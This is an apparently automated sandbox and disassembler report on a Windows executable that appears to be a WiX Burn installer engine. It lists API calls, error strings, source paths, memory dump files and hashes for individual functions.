• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp, xrefs: 00971C49, 00971C85
• Failed to copy the canonicalized path., xrefs: 00971C6B
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AllocCanonicalizeFreeLocalPath
• String ID: Failed to canonicalize: %ls$Failed to copy the canonicalized path.$Failed to initialize path2utl.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
• API String ID: 2828741713-2733107982
• Opcode ID: f3e36704da81bc0a488aec29e13d07d152cf7c4c3a2d8693018e81c838b6d196
• Instruction ID: c1869a84d4cdd1c505cb0443ec6a48905e8a74a6e2f06971aae3234e8c61376f
• Opcode Fuzzy Hash: f3e36704da81bc0a488aec29e13d07d152cf7c4c3a2d8693018e81c838b6d196
• Instruction Fuzzy Hash: B511E733FC1334B7DB322B988D0BF9E3A949B8AB55F058151FA0DBA1D1E2E09D4096D0
APIs
• CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,200001A4,00000000,00000000,00000000,200001A4,?,0093B002,00000000), ref: 00974D02
• CoCreateInstance.OLE32(00000000,00000000,00000001,009A9150,00000000,?,0093B002,00000000), ref: 00974D2A
Strings
• Failed to create instance of Microsoft.Update.AutoUpdate., xrefs: 00974D36
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp, xrefs: 00974D42
• Failed to get CLSID for Microsoft.Update.AutoUpdate., xrefs: 00974D0E
• Microsoft.Update.AutoUpdate, xrefs: 00974CFD
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CreateFromInstanceProg
• String ID: Failed to create instance of Microsoft.Update.AutoUpdate.$Failed to get CLSID for Microsoft.Update.AutoUpdate.$Microsoft.Update.AutoUpdate$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
• API String ID: 2151042543-594154128
• Opcode ID: 35373b4d31057f14dc3b97ba9ccf0c063157689809db6d4cd6c38727dcbb8f42
• Instruction ID: 9165354c994999895ec50b88de01b77d86890d5c31fcea2e98db7bc442543981
• Opcode Fuzzy Hash: 35373b4d31057f14dc3b97ba9ccf0c063157689809db6d4cd6c38727dcbb8f42
• Instruction Fuzzy Hash: 5301B572B447197AE72096ACCC46FAF76A89B49B54F420025FB04FB2C1D6A0AD0486E1
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0097C4FB,0097C6A4), ref: 0097C497
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0097C4AD
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0097C4C2
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: acb60b83b8d45a897a22ba74b25b74c2aa190a2fa9d495b0744d6c1664ddad72
• Instruction ID: f6cd54fd5afe28b5c38f6d60374e0e593284e92676135635025dcdf53acb485f
• Opcode Fuzzy Hash: acb60b83b8d45a897a22ba74b25b74c2aa190a2fa9d495b0744d6c1664ddad72
• Instruction Fuzzy Hash: 1BF0C2F375A2225B9B300F649DE5A7A22DCAB47759308807DE90EE7670FA50CC81A2D0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 009174C2
                                                                                                                                                                    • Part of subcall function 00914456: SetLastError.KERNEL32(00000000,?,?,?), ref: 0091446B
                                                                                                                                                                    • Part of subcall function 00914456: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0091447A
                                                                                                                                                                    • Part of subcall function 00914456: GetLastError.KERNEL32(?,?,?), ref: 00914484
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get current process path., xrefs: 00917462
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917416, 009174AD
                                                                                                                                                                  • Unable to get resume command line from the registry, xrefs: 0091743E
                                                                                                                                                                  • Failed to open run once log., xrefs: 00917404
                                                                                                                                                                  • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 0091749B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CloseFileHandleModuleName
                                                                                                                                                                  • String ID: Failed to get current process path.$Failed to open run once log.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 628991300-2798336238
                                                                                                                                                                  • Opcode ID: 624dca3751359407746e53225aaa0e803b1696e1b0bdcf1e73795f6fa348e9a9
                                                                                                                                                                  • Instruction ID: 401b706a33222dbd62cfc9c1da957c02338b994dcb34af8aec3e3abe39ab7888
                                                                                                                                                                  • Opcode Fuzzy Hash: 624dca3751359407746e53225aaa0e803b1696e1b0bdcf1e73795f6fa348e9a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 8931C672F4461EB7DB22ABD08C46FDEFB7DAF44740F108165B604B62D0E670AA848B90
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009598B1,009596CC,00957194), ref: 009598C8
                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009598D6
                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009598EF
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,009598B1,009596CC,00957194), ref: 00959941
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                  • Opcode ID: 6fbb48e0b8dbd8624a8651cfa80db80df29ed379841c0e24330d965387f7d6c8
                                                                                                                                                                  • Instruction ID: 3a0cf59595c8bea70c4b6a161360018b9eb8db458c3f547e51c70d9a77bfa186
                                                                                                                                                                  • Opcode Fuzzy Hash: 6fbb48e0b8dbd8624a8651cfa80db80df29ed379841c0e24330d965387f7d6c8
                                                                                                                                                                  • Instruction Fuzzy Hash: 5301D87213E322DEFB14A77B7C85B5A2658EF43776720122DFD14591E1EF114C09A340
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00917D5B,WixBundleOriginalSource,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB,?,?), ref: 0091A8AF
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00917D5B,00917D5B,00000000,00000000,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB), ref: 0091A934
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 0091A912
                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 0091A8AB
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091A8E9
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A924
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-3124624316
                                                                                                                                                                  • Opcode ID: d463ec8839f6edc67510546708bc2ed3b6913b4a6882cf6229873abb0606f5ab
                                                                                                                                                                  • Instruction ID: ffd0df1d0cddf13e4ab6dadc6f666fbade421a7fd066eb352bcf7ea1bfea7fda
                                                                                                                                                                  • Opcode Fuzzy Hash: d463ec8839f6edc67510546708bc2ed3b6913b4a6882cf6229873abb0606f5ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 6101C472B4222CBBDF215F40CC0AFDE7A689F04765F114150F904AA2A1D6B59ED0AB91
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,024B6805,000000FF,comres.dll,000000FF,00000000,?,00000000,00000000,comres.dll,wininet.dll,00000000,00916DEA,00000000,FF1C4389), ref: 00930207
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed dependents check on package provider: %ls$comres.dll$d:\a\wix4\wix4\src\burn\engine\dependency.cpp$wininet.dll
                                                                                                                                                                  • API String ID: 1825529933-2816589420
                                                                                                                                                                  • Opcode ID: f26aa4242a945c5b4a16975a79cbbd94231a67e194a785f56aa2cd943a6c2a21
                                                                                                                                                                  • Instruction ID: b4757e1eff829b327784adebf80bbdf7c0c3e3ab12a92b92f4936b68180034c4
                                                                                                                                                                  • Opcode Fuzzy Hash: f26aa4242a945c5b4a16975a79cbbd94231a67e194a785f56aa2cd943a6c2a21
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B518330A01616EFCB18DF94C899B9FBBB9FF85714F104219E5699B241C3B09991CFD1
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024,?,?,?,00935E95,000000F8), ref: 00928317
                                                                                                                                                                    • Part of subcall function 0096CCD3: RegQueryValueExW.ADVAPI32(?,?,?,0092828D,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 0096CD06
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to read Resume value., xrefs: 009282AE
                                                                                                                                                                  • Failed to open registration key., xrefs: 0092824A
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 0092825C
                                                                                                                                                                  • Resume, xrefs: 00928280
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                  • String ID: Failed to open registration key.$Failed to read Resume value.$Resume$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3356406503-1502274520
                                                                                                                                                                  • Opcode ID: 5184bd1f297f5702bf681d19688c30f56985965d9d42a70d1f9d20537c9db398
                                                                                                                                                                  • Instruction ID: 545cdda6c3efebb035c596b56138b9cf11b2b55905a0d5355ff6ee1d5cd52a55
                                                                                                                                                                  • Opcode Fuzzy Hash: 5184bd1f297f5702bf681d19688c30f56985965d9d42a70d1f9d20537c9db398
                                                                                                                                                                  • Instruction Fuzzy Hash: B4310431652635EFD7229E98EC49BAF7BA8EF40750F114161F821AB258DA74DD40C790
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00020019,?,?,00916E9A,00000001,00916DEA), ref: 00977376
                                                                                                                                                                    • Part of subcall function 009771E2: RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00916E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0097728C
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 00977308
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 009772C5
                                                                                                                                                                  • Failed to open uninstall registry key., xrefs: 009772F9
                                                                                                                                                                  • Failed to enumerate uninstall key for related bundles., xrefs: 0097738C
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close$Open
• String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
• API String ID: 2976201327-4270664815
APIs
Strings
Similarity
• API ID: _memcpy_s
• String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%ls', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
• API String ID: 2001391462-4099103365
Strings
Similarity
• API ID:
• String ID: Failed to get full path for: %ls$Failed to get parent directory for path: %ls$Full path was not rooted: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
• API String ID: 0-281674368
APIs
• CompareStringW.KERNEL32(00000000,00000001,55000CC2,000000FF,FFBC8CE8,000000FF,00916CF2,5600980C,F685F08B,00000000,00000000,0091721E,00917222,00917162,00000000,00916DEA), ref: 00930AFF
• CompareStringW.KERNEL32(00000000,00000001,8351EC8B,000000FF,FFBC8CE8,000000FF,00916CF2,5600980C,F685F08B,00000000,00000000,0091721E,00917222,00917162,00000000,00916DEA), ref: 00930B2B
Strings
• d:\a\wix4\wix4\src\burn\engine\dependency.cpp, xrefs: 00930A61
• Failed dependents check on bundle., xrefs: 00930AAE
• Failed to detect provider key bundle id., xrefs: 00930A4F
Similarity
• API ID: CompareString
• String ID: Failed dependents check on bundle.$Failed to detect provider key bundle id.$d:\a\wix4\wix4\src\burn\engine\dependency.cpp
• API String ID: 1825529933-872169753
APIs
Strings
Similarity
• API ID: _memcpy_s
• String ID: Failed to ensure buffer size.$Failed to get string size.$Failed to write string to buffer: '%hs', error: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
• API String ID: 2001391462-3750679403
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0096BCD0
• GetLastError.KERNEL32 ref: 0096BCDA
Strings
Similarity
• API ID: ErrorLastLookupPrivilegeValue
• String ID: Failed to get privilege LUID: %ls$Failed to get token privilege information.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp
• API String ID: 2626710698-2191672025
APIs
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0093FCBA
Strings
• Failed to initialize package from related bundle id: %ls, xrefs: 0093FD1E
• d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp, xrefs: 0093FD30, 0093FD62
• Failed to ensure there is space for related bundles., xrefs: 0093FCE5
• Failed to detect dependencies for related bundle., xrefs: 0093FD50
Similarity
• API ID: CompareString
• String ID: Failed to detect dependencies for related bundle.$Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$d:\a\wix4\wix4\src\burn\engine\relatedbundle.cpp
• API String ID: 1825529933-344177745
                                                                                                                                                                  • Opcode ID: e6a3d02584568216583d34ce1054e38df8574b942e91aa0785a504c1009471fb
                                                                                                                                                                  • Instruction ID: 4b78bb1330e013e659348fe1936bbf0142ea76b10df1dccfeba62a427d7a0637
                                                                                                                                                                  • Opcode Fuzzy Hash: e6a3d02584568216583d34ce1054e38df8574b942e91aa0785a504c1009471fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 6221B532E41624BBDF129F58CC46FAABB65EF49720F104261FD24AE1D1E3B0D850DB91
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(0097E860,000000FF), ref: 009562B4
                                                                                                                                                                  • ReleaseMutex.KERNEL32(0097E860), ref: 009562E2
                                                                                                                                                                  • SetEvent.KERNEL32(00000000), ref: 009562EB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                  • String ID: Failed to allocate buffer.$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                  • API String ID: 944053411-1881421891
                                                                                                                                                                  • Opcode ID: 6547e78d5f3e837c0582b8182ecf1888e969ab858c65e9fa01fade458120ace6
                                                                                                                                                                  • Instruction ID: fb1c599839b5a73a884cd28b8da810bcbcb4109c6f8576a590fc80dd2cb979ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 6547e78d5f3e837c0582b8182ecf1888e969ab858c65e9fa01fade458120ace6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3731C071A0060ABFDB00DF58CC44A9EB7F9FF48314F118568F924A7261C371AD918BA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,00919840,00919840,?,00918154,?,?,00000000), ref: 00918342
                                                                                                                                                                  • GetLastError.KERNEL32(?,00918154,?,?,00000000,?,00000000,00919840,?,0091B468,?,?,?,?,?), ref: 00918371
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                                                  • String ID: Failed to compare strings.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$version.dll
                                                                                                                                                                  • API String ID: 1733990998-1162684775
                                                                                                                                                                  • Opcode ID: f4c5fe54bc815762509d11743a72e5c327681a49748120d440c7b0cb5c8fbefe
                                                                                                                                                                  • Instruction ID: 42c56db113a158a9c5b127b8c61a013caa94062ba058adf6bbd6a23d7f068046
                                                                                                                                                                  • Opcode Fuzzy Hash: f4c5fe54bc815762509d11743a72e5c327681a49748120d440c7b0cb5c8fbefe
                                                                                                                                                                  • Instruction Fuzzy Hash: 3621D873700119ABC7108F58CD45BAEB669AB49B60F290615F934AB3D0DA70ED42A7A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,0093EC52,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00911673
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MultipleObjectsWait
                                                                                                                                                                  • String ID: Abandoned wait for multiple objects, index: %u.$Failed to wait for multiple objects.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                  • API String ID: 862713236-4067188417
                                                                                                                                                                  • Opcode ID: 118f210e7e6f9726667c6494254e9cac6ca9bed40b9b9a1bd9f91545ee828350
                                                                                                                                                                  • Instruction ID: 8281705ba42a2868c5dbb6cce909fd9a562eb9ced4717fb71d0427a1fff00bb3
                                                                                                                                                                  • Opcode Fuzzy Hash: 118f210e7e6f9726667c6494254e9cac6ca9bed40b9b9a1bd9f91545ee828350
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A213573B4122973DB2059154C4AFDF695CEB44B61F064525FF06BF2C2E6758C8082E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00919893
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
                                                                                                                                                                  Strings
